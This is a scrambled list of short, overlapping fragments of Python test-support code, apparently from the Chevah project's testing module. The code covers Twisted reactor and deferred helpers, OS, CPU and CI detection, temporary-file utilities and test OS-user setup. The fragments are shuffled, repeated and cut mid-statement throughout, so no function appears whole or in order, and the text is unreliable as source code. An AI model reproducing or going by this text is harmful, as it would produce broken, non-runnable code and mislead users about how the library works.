[ "succeeds, then the result of C{deferred} is left unchanged. Otherwise,", "expectedExceptionTypes: Exception types to expect - if provided, and the", "drop_user): \"\"\" Initialize the testing environment. \"\"\" cls._drop_user = drop_user", "Iterate the reactor without stopping it. \"\"\" iterations = [False]", "deferred, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self, deferred,", "self.EXCEPTED_DELAYED_CALLS: if excepted_callback in delayed_str: is_exception = True if not", "# AlreadyCancelled and AlreadyCalled are ValueError. # Might be canceled", "calls to be executed and will not stop the reactor.", "temporary files or folders are present. \"\"\" # FIXME:922: #", "7 class_name = class_name[tests_start:] return \"%s - %s.%s\" % (", "super_assertRaises(exception_class) with super_assertRaises(exception_class) as context: callback(*args, **kwargs) return context.exception def", "as resolved by default DNS resolver. \"\"\" return socket.gethostname() class", "_get_cpu_type(): \"\"\" Return the CPU type as used in the", "@param expectedExceptionTypes: Exception types to expect - if provided, and", "import patch, Mock from nose import SkipTest try: from twisted.internet.defer", "platform.processor() if base == 'aarch64': return 'arm64' if base ==", "will wait for delayed calls to be executed and will", "\"\"\" Overwrite stdlib to swap the arguments. \"\"\" if source", "\" or \".join([ '.'.join((t.__module__, t.__name__)) for t in expectedExceptionTypes]) self.fail(", "string representation of the delayed call. \"\"\" raw_name = text_type(delayed_call.func)", "or empty when threadpool does not exists or has no", "has a result. \"\"\" # FIXME:1370: # Remove / re-route", "'Reactor is not clean. %s: %s' % (location, reason)) if", "We are now in Unix zone. os_name = os.uname()[0].lower() if", "= patch _environ_user = None _drop_user = '-' def setUp(self):", "the result of C{deferred} is left unchanged. Otherwise, any L{failure.Failure}", "Mock from nose import SkipTest try: from twisted.internet.defer import Deferred", "import reactor except ImportError: reactor = None def _get_hostname(): \"\"\"", "= process_capabilities.os_name os_family = process_capabilities.os_family os_version = _get_os_version() cpu_type =", "tasks of thread Pool, or [] when threadpool does not", "no version. return 'arch' if distro_name in ['centos', 'ol']: #", "or has no job. \"\"\" if not reactor.threadpool: return []", "Look at threads queue and active thread. if len(reactor.threadCallQueue) >", "the last callback or errback raised an exception or returned", "= threading.enumerate() if len(threads) > 1: for thread in threads:", "' u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result =", "delayed_call.cancel() except (ValueError, AttributeError): # AlreadyCancelled and AlreadyCalled are ValueError.", "no delayed calls, readers or writers. This should only be", "Reactor was not stopped, so stop it before raising the", "raise_failure('threadpoool threads', self._threadPoolThreads()) if len(reactor.getWriters()) > 0: # noqa:cover raise_failure('writers',", "reactor until callable returns `True`. \"\"\" if timeout is None:", "Return the name of the CI on which the tests", "\"\"\" if not self._timeout_reached: # Everything fine, disable timeout. if", "default temp folder and mark it for cleanup. \"\"\" kwargs['cleanup']", "source): \"\"\" Overwrite stdlib to swap the arguments. 
\"\"\" if", "for tests that need a dedicated local OS account present.", "time to execute the stop code. reactor.iterate() # Set flag", "itself which run in one tread and from the fixtures/cleanup", "text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call)", "if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser()", "): self._reactor_timeout_call.cancel() if prevent_stop: # Don't continue with stop procedure.", "is waiting on another L{Deferred<twisted.internet.defer.Deferred>} for a result. @type deferred:", "removed. \"\"\" if not mk.fs.exists(folder_segments): return [] # In case", "deferred, result[0].type, result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def assertNoResult(self,", "details. \"\"\" TestCase used for Chevah project. \"\"\" from __future__", "if not isinstance(value, expected_type): raise AssertionError( \"Expecting type %s, but", "'Deferred contains a failure: %s' % (error)) def _get_os_version(): \"\"\"", "False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the reactor. \"\"\"", "'arm64' if base == 'x86_64': return 'x64' return base _CI_NAMES", "as they # will not spin the reactor. # To", "This is low level method. In most tests you would", "if t2 is None or t2 > 1: t2 =", "called. \"\"\" if not deferred.called: raise AssertionError('This deferred was not", "a failure: %s' % (error)) def _get_os_version(): \"\"\" On non-Linux", "'true': return _CI_NAMES.TRAVIS if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES': return _CI_NAMES.AZURE", "# FIXME:863: # When running threads tests the reactor touched", "except AssertionError as error: errors.append(error.message) if errors: # noqa:cover self._teardown_errors.append(AssertionError(", "to allow non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if", "an timeout error while executing the reactor. \"\"\" self._timeout_reached =", "> 1: t2 = 0.1 t = reactor.running and t2", "To be called at the end of a stacked cleanup.", "We search starting with second stack, since first stack is", "it will call lsb_release. import ld distro_name = ld.id() if", "thread Pool, or [] when threadpool does not exists. This", "as root and we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user)", "and we drop effective user # privileges. system_users.dropPrivileges(username=cls._drop_user) @staticmethod def", "self.enterCleanup() yield finally: self.exitCleanup() def _checkTemporaryFiles(self): \"\"\" Check that no", "reactor once. This is useful if you have persistent deferred", "PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result", "sys import time from bunch import Bunch from mock import", "Helper for generic patching. 
\"\"\" return patch(*args, **kwargs) @staticmethod def", "mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\" Overwrite stdlib to", "excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler', 'GlobalPool-TaskHandler', 'GlobalPool-ResultHandler', 'PoolThread-twisted.internet.reactor', ]", "if not msg: msg = u'First is unicode while second", "( thread_name, threads))) super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None", "internal state # is changed from other source. pass reactor.threadCallQueue", "_UnixWaker, _SIGCHLDWaker ) from twisted.python.failure import Failure except ImportError: #", "\"\"\" result = [] for delayed in reactor.getDelayedCalls(): # noqa:cover", "the reactor once. This is useful if you have persistent", "start = time.time() self.executeReactorUntil( lambda _: time.time() - start >", "failure result. @return: The failure result of C{deferred}. @rtype: L{failure.Failure}", "timeout) self._reactor_timeout_failure = failure def _initiateTestReactor(self, timeout): \"\"\" Do the", "run. When prevent_stop=True, the reactor will not be stopped. \"\"\"", "if deferred is a Failure. The failed deferred is handled", "u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(),", "find \"success\" attribute.') return success def tearDown(self): try: if self._caller_success_member:", "representation of all delayed calls from reactor queue. \"\"\" result", "modules are changing the reactor. from twisted.internet import reactor except", "= [ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = [] for check", "u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid()) result = local_wmi.query(query.encode('utf-8'))", "# Disabled when we can not find the home folder", "self._testMethodName) def assertRaises(self, exception_class, callback=None, *args, **kwargs): \"\"\" Wrapper around", "\"\"\" Common test case for all file-system tests using a", "# Set flag to fake a clean reactor. reactor._startedBefore =", "os_name. On Linux is the distribution name and the version.", "if self._threadPoolWorking(): raise_failure('threadpoool working', self._threadPoolWorking()) if self._threadPoolThreads(): raise_failure('threadpoool threads', self._threadPoolThreads())", "not the marketing name. We only support the Windows NT", "== 'true': return _CI_NAMES.GITHUB if os.environ.get('TRAVIS', '').lower() == 'true': return", "hostname of the current system. \"\"\" return _get_hostname() @classmethod def", "def assertIsInstance(self, expected_type, value, msg=None): \"\"\" Raise an exception if", "try: success = inspect.stack()[i][0].f_locals['success'] break except KeyError: success = None", "u'SELECT PeakWorkingSetSize ' u'FROM Win32_Process ' u'WHERE Handle=%d' % os.getpid())", "point. 
If the assertion succeeds, then the result of C{deferred}", "self._initiateTestReactor(timeout=timeout) while not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def", "( reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks =", "# noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self): \"\"\" Called", "success_state is None: raise AssertionError('Failed to find \"success\" attribute.') return", "7): from unittest2 import TestCase # Shut up you linter.", "from mock import patch, Mock from nose import SkipTest try:", "not be raised at reactor shutdown for not being handled.", "reactor.threadpool.working or (reactor.threadpool.q.qsize() > 0) ): time.sleep(0.01) have_callbacks = True", "current system. \"\"\" return _get_hostname() @classmethod def initialize(cls, drop_user): \"\"\"", "to wake at an # interval of at most 1", "`osx` followed by the version. It is not the version", "The format is customized for Chevah Nose runner. This is", "queries. hostname = _get_hostname() Bunch = Bunch Mock = Mock", "if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None, debug=False): \"\"\"", "cleanup. \"\"\" self.callCleanup() self.__cleanup__ = self._cleanup_stack.pop() @contextlib.contextmanager def stackedCleanup(self): \"\"\"", "def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current failure result", "iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate the reactor for `duration` seconds..", "result of C{deferred} is left unchanged. Otherwise, any L{failure.Failure} result", "list) def _baseAssertEqual(self, first, second, msg=None): \"\"\" Update to stdlib", "twisted.python.failure import Failure except ImportError: # Twisted support is optional.", "continue self._teardown_errors.append(AssertionError( 'There are still active threads, ' 'beside the", "callback=None, *args, **kwargs): \"\"\" Wrapper around the stdlib call to", "\"\"\" Return the name of the CI on which the", "will be created before running the test case and removed", "is only called when we run with -v or we", "source not in target: message = u'%s not in %s.'", "for thread in threads: thread_name = thread.getName() if self._isExceptedThread(thread_name): continue", "cls._drop_user os.environ['USER'] = cls._drop_user # Test suite should be started", "_shutdownTestReactor(self, prevent_stop=False): \"\"\" Called at the end of a test", "self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1, timeout=None,", "delayed calls to be executed and will not stop the", "if distro_name == 'arch': # Arch has no version. return", "compare str with unicode. \"\"\" if ( isinstance(first, text_type) and", "C{deferred}. @rtype: L{failure.Failure} \"\"\" # FIXME:1370: # Remove / re-route", "Remove all delayed calls, readers and writers from the reactor.", "= self.getDeferredResult(deferred) self.assertEqual('something', result) \"\"\" self._runDeferred( deferred, timeout=timeout, debug=debug, prevent_stop=prevent_stop,", "second, msg, seq_type): super(ChevahTestCase, self).assertSequenceEqual( first, second, msg, seq_type) for", "stacked cleanups. 
\"\"\" self._cleanup_stack.append(self.__cleanup__) self.__cleanup__ = [] def exitCleanup(self): \"\"\"", "\"\"\" class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start =", "timeout=None, debug=False, prevent_stop=False): \"\"\" This is low level method. In", "context: callback(*args, **kwargs) return context.exception def assertSequenceEqual(self, first, second, msg,", "customized for Chevah Nose runner. This is only called when", "thread pool. if reactor.threadpool: if ( reactor.threadpool.working or (reactor.threadpool.q.qsize() >", "True break if not excepted: # noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for", "reports value in bytes, instead of Kilobytes. return int(peak_working_set_size) else:", "try: # Import reactor last in case some other modules", "and not self._timeout_reached: self._iterateTestReactor(debug=debug) have_callbacks = False # Check for", "calls from reactor queue. \"\"\" result = [] for delayed", "= protocol protocol.lineReceived('FEAT') self.executeReactor() result = transport.value() self.assertStartsWith('211-Features:\\n', result) \"\"\"", "not self._timeout_reached: self._iterateTestReactor(debug=debug) if callable(reactor): break self._shutdownTestReactor(prevent_stop=prevent_stop) def iterateReactor(self, count=1,", "callback chain and the last callback or errback raised an", "class_name = text_type(self.__class__)[8:-2] class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.')", "allow non-context usage. \"\"\" super_assertRaises = super(ChevahTestCase, self).assertRaises if callback", "# noqa:cover if not msg: msg = u'First is unicode", "if cls._drop_user == '-': return os.environ['USERNAME'] = cls._drop_user os.environ['USER'] =", "stop waiting for a deferred. _reactor_timeout_call = None def setUp(self):", "%r, \" \"found success result (%r) instead\" % (deferred, result[0]))", "L{failure.Failure} result is swallowed. @param deferred: A L{Deferred<twisted.internet.defer.Deferred>} without a", "return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes): \"\"\" Return the current", "new temp folder and return its path and segments, which", "result[0].getBriefTraceback().decode( 'utf-8', errors='replace'))) else: return result[0] def failureResultOf(self, deferred, *expectedExceptionTypes):", "Number of second to wait for a deferred to have", "def _get_ci_name(): \"\"\" Return the name of the CI on", "the Twisted thread queue, which will never be called. \"\"\"", "not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user = cls.setUpTestUser() home_folder_path", "Check that deferred was called. \"\"\" if not deferred.called: raise", "Twisted specific code. Provides support for running deferred and start/stop", "[ self.assertTempIsClean, self.assertWorkingFolderIsClean, ] errors = [] for check in", "to True to enter the first loop. 
have_callbacks = True", "timeout): \"\"\" Signal an timeout error while executing the reactor.", "very high level integration code, where you don't have the", "\"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function ', '') raw_name", "seq_type) for first_element, second_element in zip(first, second): self.assertEqual(first_element, second_element) def", "return mk.fs.fileInTemp(*args, **kwargs) def assertIn(self, target, source): \"\"\" Overwrite stdlib", "( expected_type, type(value), msg)) def tempPath(self, prefix='', suffix=''): \"\"\" Return", "isinstance(result, Deferred): self._executeDeferred(result, timeout=timeout, debug=debug) result = deferred.result def executeReactor(self,", "%s\" % ( expected_type, type(value), msg)) def tempPath(self, prefix='', suffix=''):", "deferred execution. \"\"\" if not deferred.called: deferred_done = False while", "\"\"\" Do the steps required to initiate a reactor for", "run in one tread and from the fixtures/cleanup # code", "not have a result at this point. If the assertion", "**kwargs) def assertIn(self, target, source): \"\"\" Overwrite stdlib to swap", "Scheduled event to stop waiting for a deferred. _reactor_timeout_call =", "the first loop. have_callbacks = True while have_callbacks and not", "= value, expected_type if not isinstance(value, expected_type): raise AssertionError( \"Expecting", "names for delayed calls which should not be considered as", "auto cleaned. \"\"\" segments = mk.fs.createFolderInTemp( foldername=name, prefix=prefix, suffix=suffix) path", "= True continue if reactor.threadpool and len(reactor.threadpool.working) > 0: have_callbacks", "to expect - if provided, and the the exception wrapped", "is unicode for \"%s\".' % ( first,) raise AssertionError(msg.encode('utf-8')) return", "second. if t2 is None or t2 > 1: t2", "execution. \"\"\" if not deferred.called: deferred_done = False while not", "platform.release().split('.') return 'solaris-%s' % (parts[1],) if os_name == 'aix': #", "Let the reactor know that we want to stop reactor.", "will fail as they # will not spin the reactor.", "or [] when threadpool does not exists. This should only", "from the separate thread. # AttributeError can occur when we", "since first stack is the # current stack and we", "**kwargs) return context.exception def assertSequenceEqual(self, first, second, msg, seq_type): super(ChevahTestCase,", "DefaultAvatar() temp_filesystem = LocalFilesystem(avatar=temp_avatar) temp_members = [] for member in", "folderInTemp(self, *args, **kwargs): \"\"\" Create a folder in the default", "or folders left over.\\n %s' % ( '\\n'.join(errors)))) def shortDescription(self):", "debug=False, run_once=False): \"\"\" Run reactor until no more delayed calls,", "debug=debug, prevent_stop=prevent_stop, ) self.assertIsFailure(deferred) failure = deferred.result self.ignoreFailure(deferred) return failure", "[ _UnixWaker, _SocketWaker, _SIGCHLDWaker, ] # Scheduled event to stop", "%.2f seconds to execute.' % timeout) self._reactor_timeout_failure = failure def", "delayed_call.active(): delayed_str = self._getDelayedCallName(delayed_call) if delayed_str in self.EXCEPTED_DELAYED_CALLS: continue raise_failure('delayed", "a string representation of the delayed call. \"\"\" raw_name =", "i in range(2, 6): try: success = inspect.stack()[i][0].f_locals['success'] break except", "timeout=timeout, debug=debug, prevent_stop=False, ) def iterateReactorForSeconds(self, duration=1, debug=False): \"\"\" Iterate", "delayed call. 
\"\"\" raw_name = text_type(delayed_call.func) raw_name = raw_name.replace('<function ',", "NT version. It is not the marketing name. We only", "member from the None test case. \"\"\" success = None", "or L{Deferred.errback<twisted.internet.defer.Deferred.errback>} has been called on it and it has", "attribute.') return success_state @staticmethod def patch(*args, **kwargs): \"\"\" Helper for", "some other modules are changing the reactor. from twisted.internet import", "reactor._justStopped = False reactor.startRunning() def _iterateTestReactor(self, debug=False): \"\"\" Iterate the", "output. print ( u'delayed: %s\\n' u'threads: %s\\n' u'writers: %s\\n' u'readers:", "the types provided, then this test will fail. @raise SynchronousTestCase.failureException:", "@type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a", "Return a list of members which were removed. \"\"\" return", "None if success is None: raise AssertionError('Failed to find \"success\"", "elif (expectedExceptionTypes and not result[0].check(*expectedExceptionTypes)): expectedString = \" or \".join([", "self._timeout_reached: raise AssertionError( 'Deferred took more than %d to execute.'", "folder path. if not process_capabilities.get_home_folder: raise cls.skipTest() super(FileSystemTestCase, cls).setUpClass() cls.os_user", "as error: # noqa:cover self._teardown_errors.append(error) self.__cleanup__ = [] def enterCleanup(self):", "socket import sys import time from bunch import Bunch from", "time.sleep(0.01) have_callbacks = True continue # Look at delayed calls.", "super(ChevahTestCase, self)._baseAssertEqual( first, second, msg=msg) @staticmethod def getHostname(): \"\"\" Return", "== 'darwin': parts = platform.mac_ver()[0].split('.') return 'osx-%s.%s' % (parts[0], parts[1])", "opened_file.close() return (path, segments) def tempFolder(self, name=None, prefix='', suffix=''): \"\"\"", "the full thread name excepted_threads = [ 'MainThread', 'threaded_reactor', 'GlobalPool-WorkerHandler',", "division from __future__ import absolute_import from six import text_type from", "return [] result = [] while len(reactor.threadpool._team._pending): result.append(reactor.threadpool._team._pending.pop()) return result", "on failures. self._shutdownTestReactor() raise AssertionError( 'executeDelayedCalls took more than %s'", "def executeDelayedCalls(self, timeout=None, debug=False): \"\"\" Run the reactor until no", "to stop reactor. reactor.stop() # Let the reactor run one", "return socket.gethostname() class TwistedTestCase(TestCase): \"\"\" Test case for Twisted specific", "delayed calls which should not be considered as # required", "expected on %r, \" \"found success result (%r) instead\" %", "threading.enumerate() if len(threads) > 1: for thread in threads: thread_name", "Set flag to fake a clean reactor. reactor._startedBefore = False", "self.ignoreFailure(deferred) return failure def successResultOf(self, deferred): \"\"\" Return the current", "to look for other things as we already know that", "need to look for other things as we already know", "# noqa:cover raise_failure('readers', text_type(reactor.getReaders())) for delayed_call in reactor.getDelayedCalls(): if delayed_call.active():", "from __future__ import print_function from __future__ import division from __future__", "type %s, but got %s. %s\" % ( expected_type, type(value),", "\"Failure result expected on %r, found no result instead\" %", "optional. 
try:
    from twisted.internet.defer import Deferred
    from twisted.internet.posixbase import (
        _SocketWaker, _UnixWaker, _SIGCHLDWaker
        )
    from twisted.python.failure import Failure
except ImportError:
    # Twisted support is optional.
    _SocketWaker = None
    _UnixWaker = None
    _SIGCHLDWaker = None

from chevah.compat import (
    DefaultAvatar,
    LocalFilesystem,
    process_capabilities,
    system_users,
    SuperAvatar,
    )
from chevah.compat.administration import os_administration
from chevah.compat.testing.assertion import AssertionMixin
from chevah.compat.testing.mockup import mk
from chevah.compat.testing.constant import (
    TEST_NAME_MARKER,
    )
# Import needed by FileSystemTestCase.setUp below; the module path is an
# assumption based on the other `chevah.compat.testing` imports.
from chevah.compat.testing.filesystem import LocalTestFilesystem

try:
    # Import reactor last in case some other modules are changing the
    # reactor.
    from twisted.internet import reactor
except ImportError:
    reactor = None

def _get_os_version():
    """
    On non-Linux, this is just the os_name.

    On Linux it is the distribution name and the version.

    On Windows it is `nt` followed by the major and minor NT version.
    It is not the marketing name.

    On macOS it is the macOS version and not the version of the
    underlying Darwin OS.
    See: https://en.wikipedia.org/wiki/MacOS#Release_history
    """
    if os.name == 'nt':
        parts = platform.version().split('.')
        return 'nt-%s.%s' % (parts[0], parts[1])

    # We are now in Unix zone.
    os_name = os.uname()[0].lower()

    if os_name == 'darwin':
        parts = platform.mac_ver()[0].split('.')
        return 'osx-%s.%s' % (parts[0], parts[1])

    if os_name == 'sunos':
        parts = platform.release().split('.')
        return 'solaris-%s' % (parts[1],)

    if os_name == 'aix':  # noqa:cover
        return 'aix-%s.%s' % (platform.version(), platform.release())

    if os_name != 'linux':
        return process_capabilities.os_name

    # We delay the import as it will call lsb_release.
    import ld
    distro_name = ld.id()

    if distro_name == 'arch':
        # Arch has no version.
        return 'arch'

    if distro_name in ['centos', 'ol']:
        # Normalize the RHEL variants.
        distro_name = 'rhel'

    distro_version = ld.version().split('.', 1)[0]
    return '%s-%s' % (distro_name, distro_version)

def _get_cpu_type():
    """
    Return the CPU type as used in the brink.sh script.
    """
    base = platform.processor()
    if base == 'aarch64':
        return 'arm64'
    if base == 'x86_64':
        return 'x64'
    return base


_CI_NAMES = Bunch(
    LOCAL='local',
    GITHUB='github-actions',
    TRAVIS='travis',
    BUILDBOT='buildbot',
    UNKNOWN='unknown-ci',
    AZURE='azure-pipelines',
    )


def _get_ci_name():
    """
    Return the name of the CI on which the tests are currently executed.
    """
    if os.environ.get('GITHUB_ACTIONS', '').lower() == 'true':
        return _CI_NAMES.GITHUB

    if os.environ.get('TRAVIS', '').lower() == 'true':
        return _CI_NAMES.TRAVIS

    if os.environ.get('BUILDBOT', '').lower() == 'true':
        return _CI_NAMES.BUILDBOT

    if os.environ.get('INFRASTRUCTURE', '') == 'AZUREPIPELINES':
        return _CI_NAMES.AZURE

    if os.environ.get('CI', '').lower() == 'true':
        return _CI_NAMES.UNKNOWN

    return _CI_NAMES.LOCAL


def _get_hostname():
    """
    Return the hostname as resolved by the default DNS resolver.
    """
    return socket.gethostname()
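
# A minimal usage sketch, not part of the original module: combining the
# platform helpers above into a single build label. The helper name
# `_example_platform_label` and the label format are assumptions.
def _example_platform_label():
    """
    Return a label such as 'rhel-8-x64' or 'nt-10.0-x64-github-actions'.
    """
    label = '%s-%s' % (_get_os_version(), _get_cpu_type())
    ci_name = _get_ci_name()
    if ci_name != _CI_NAMES.LOCAL:
        # Only tag the label when running under a known CI.
        label = '%s-%s' % (label, ci_name)
    return label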

class TwistedTestCase(TestCase):
    """
    Test case for Twisted specific code.

    Provides support for running deferreds and for starting/stopping the
    reactor during tests.
    """

    # Number of seconds to wait for a deferred to have a result.
    DEFERRED_TIMEOUT = 1

    # List of names for delayed calls which should not be considered as
    # required to wait for them when running the reactor.
    EXCEPTED_DELAYED_CALLS = []

    EXCEPTED_READERS = [
        _UnixWaker,
        _SocketWaker,
        _SIGCHLDWaker,
        ]

    # Scheduled event to stop waiting for a deferred.
    _reactor_timeout_call = None

    def setUp(self):
        super(TwistedTestCase, self).setUp()
        self._timeout_reached = False
        self._reactor_timeout_failure = None

    @property
    def _caller_success_member(self):
        """
        Retrieve the 'success' member from the running test case.
        """
        success = None
        for i in range(2, 6):
            try:
                success = inspect.stack()[i][0].f_locals['success']
                break
            except KeyError:
                success = None

        if success is None:
            raise AssertionError('Failed to find "success" attribute.')

        return success

    def tearDown(self):
        try:
            if self._caller_success_member:
                # Check for a clean reactor at shutdown, only if test
                # passed.
                self.assertIsNone(self._reactor_timeout_failure)
                self._assertReactorIsClean()
        finally:
            self._cleanReactor()
        super(TwistedTestCase, self).tearDown()
    def _reactorQueueToString(self):
        """
        Return a string representation of all delayed calls from the
        reactor queue.
        """
        result = []
        for delayed in reactor.getDelayedCalls():  # noqa:cover
            result.append(text_type(delayed.func))
        return '\n'.join(result)

    def _threadPoolQueue(self):
        """
        Return the current tasks of the thread pool, or [] when the
        threadpool does not exist.

        This should only be called at cleanup as it removes elements from
        the Twisted thread queue, which will never be called.
        """
        if not reactor.threadpool:
            return []

        result = []
        while len(reactor.threadpool._team._pending):
            result.append(reactor.threadpool._team._pending.pop())
        return result

    def _threadPoolThreads(self):
        """
        Return current threads from the pool, or an empty list when the
        threadpool does not exist.
        """
        if not reactor.threadpool:
            return []
        else:
            return reactor.threadpool.threads

    def _threadPoolWorking(self):
        """
        Return the working threads from the pool, or empty when the
        threadpool does not exist or has no job.
        """
        if not reactor.threadpool:
            return []
        return reactor.threadpool.working
    @classmethod
    def _cleanReactor(cls):
        """
        Remove all delayed calls, readers and writers from the reactor.

        This is only for cleanup purposes and should not be used by
        normal tests.
        """
        if not reactor:
            return
        try:
            reactor.removeAll()
        except (RuntimeError, KeyError):
            # FIXME:863:
            # When running threads tests, the reactor is touched from the
            # test case itself, which runs in one thread, and from the
            # fixtures/cleanup code, which is executed from another
            # thread.
            # removeAll might fail since it detects that internal state
            # is changed from another thread.
            pass

        reactor.threadCallQueue = []
        for delayed_call in reactor.getDelayedCalls():
            try:
                delayed_call.cancel()
            except (ValueError, AttributeError):
                # AlreadyCancelled and AlreadyCalled are ValueError.
                # Might be canceled from the separate thread.
                # AttributeError can occur when we do multi-threading.
                pass

    def _raiseReactorTimeoutError(self, timeout):
        """
        Signal a timeout error while executing the reactor.
        """
        self._timeout_reached = True
        failure = AssertionError(
            'Reactor took more than %.2f seconds to execute.' % timeout)
        self._reactor_timeout_failure = failure

    def _initiateTestReactor(self, timeout):
        """
        Do the steps required to initiate a reactor for testing.
        """
        self._timeout_reached = False

        # Set up timeout.
        self._reactor_timeout_call = reactor.callLater(
            timeout, self._raiseReactorTimeoutError, timeout)

        # Don't start the reactor if it is already started.
        # This can happen if we prevent stop in a previous run.
        if reactor._started:
            return

        reactor._startedBefore = False
        reactor._started = False
        reactor._justStopped = False
        reactor.startRunning()
\"\"\" os_administration.addUser(cls.CREATE_TEST_USER) return", "return try: reactor.removeAll() except (RuntimeError, KeyError): # FIXME:863: # When", "isInstance is already defined, but with swapped # arguments. if", "Raise an exception if `value` is not an instance of", "self.assertEqual(first_element, second_element) def assertDictEqual(self, first, second, msg): super(ChevahTestCase, self).assertDictEqual(first, second,", "threads: %s\\n' u'threadpool working: %s\\n' u'\\n' % ( self._reactorQueueToString(), reactor.threadCallQueue,", "Return current tasks of thread Pool, or [] when threadpool", "import print_function from __future__ import division from __future__ import absolute_import", "# passed. self.assertIsNone(self._reactor_timeout_failure) self._assertReactorIsClean() finally: self._cleanReactor() super(TwistedTestCase, self).tearDown() def _reactorQueueToString(self):", "second, msg) first_elements = sorted(first) second_elements = sorted(second) self.assertSequenceEqual(first_elements, second_elements,", "prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) self.addCleanup(mk.fs.deleteFolder, segments, recursive=True) return (path,", "from the test case.''' success_state = None # We search", "\"\"\" Run the deferred and return the failure. Usage:: checker", "to get a \"root\" deferred. In most tests you would", "not None: self._reactor_timeout_failure = None # We stop the reactor", "an instance of `expected_type` \"\"\" # In Python 2.7 isInstance", "more than %.2f seconds to execute.' % timeout) self._reactor_timeout_failure =", "Nose runner. This is only called when we run with", "does not change during test and this # should save", "super_assertRaises = super(ChevahTestCase, self).assertRaises if callback is None: return super_assertRaises(exception_class)", "low level method. In most tests you would like to", "for a result. @type deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the", "timeout call. if delayed is self._reactor_timeout_call: continue if not delayed.func:", "deferred: L{Deferred<twisted.internet.defer.Deferred>} @raise SynchronousTestCase.failureException: If the L{Deferred<twisted.internet.defer.Deferred>} has a result.", "continue # Look at delayed calls. for delayed in reactor.getDelayedCalls():", "and AlreadyCalled are ValueError. # Might be canceled from the", "class_name = class_name.replace('.Test', ':Test') tests_start = class_name.find('.tests.') + 7 class_name", "reactor.threadCallQueue, reactor.getWriters(), reactor.getReaders(), reactor.getThreadPool().q.qsize(), self._threadPoolThreads(), self._threadPoolWorking(), ) ) t2 =", "was not called yet.') def ignoreFailure(self, deferred): \"\"\" Ignore the", "Iterate the reactor for `duration` seconds.. \"\"\" start = time.time()", "result def _threadPoolThreads(self): \"\"\" Return current threads from pool, or", "is the # current stack and we don't care about", "= AssertionError( 'Reactor took more than %.2f seconds to execute.'", "\"\"\" segments = mk.fs.createFileInTemp(prefix=prefix, suffix=suffix) path = mk.fs.getRealPathFromSegments(segments) if cleanup:", "super(ChevahTestCase, self).tearDown() errors, self._teardown_errors = self._teardown_errors, None if errors: raise", "second, msg, seq_type) for first_element, second_element in zip(first, second): self.assertEqual(first_element,", "case for tests that need a dedicated local OS account", "and return the result. 
    def _assertReactorIsClean(self):
        """
        Check that the reactor has no delayed calls, readers or writers
        left over.

        This should only be called at teardown.
        """
        if reactor is None:
            return

        def raise_failure(location, reason):
            raise AssertionError(
                'Reactor is not clean. %s: %s' % (location, reason))

        if reactor._started:  # noqa:cover
            # Reactor was not stopped, so stop it before raising the
            # error.
            self._shutdownTestReactor()
            raise AssertionError('Reactor was not stopped.')

        # Look at threads queue.
        if len(reactor.threadCallQueue) > 0:
            raise_failure('queued threads', reactor.threadCallQueue)

        if reactor.threadpool and len(reactor.threadpool.working) > 0:
            raise_failure('active threads', reactor.threadCallQueue)

        pool_queue = self._threadPoolQueue()
        if pool_queue:
            raise_failure('threadpool queue', pool_queue)

        if self._threadPoolWorking():
            raise_failure('threadpool working', self._threadPoolWorking())

        if self._threadPoolThreads():
            raise_failure('threadpool threads', self._threadPoolThreads())

        if len(reactor.getWriters()) > 0:  # noqa:cover
            raise_failure('writers', text_type(reactor.getWriters()))

        for reader in reactor.getReaders():
            excepted = False
            for reader_type in self.EXCEPTED_READERS:
                if isinstance(reader, reader_type):
                    excepted = True
                    break
            if not excepted:  # noqa:cover
                raise_failure('readers', text_type(reactor.getReaders()))

        for delayed_call in reactor.getDelayedCalls():
            if delayed_call.active():
                delayed_str = self._getDelayedCallName(delayed_call)
                if delayed_str in self.EXCEPTED_DELAYED_CALLS:
                    continue
                raise_failure('delayed calls', delayed_str)
    def _runDeferred(
            self, deferred, timeout=None, debug=False, prevent_stop=False):
        """
        This is a low level method. In most tests you would like to use
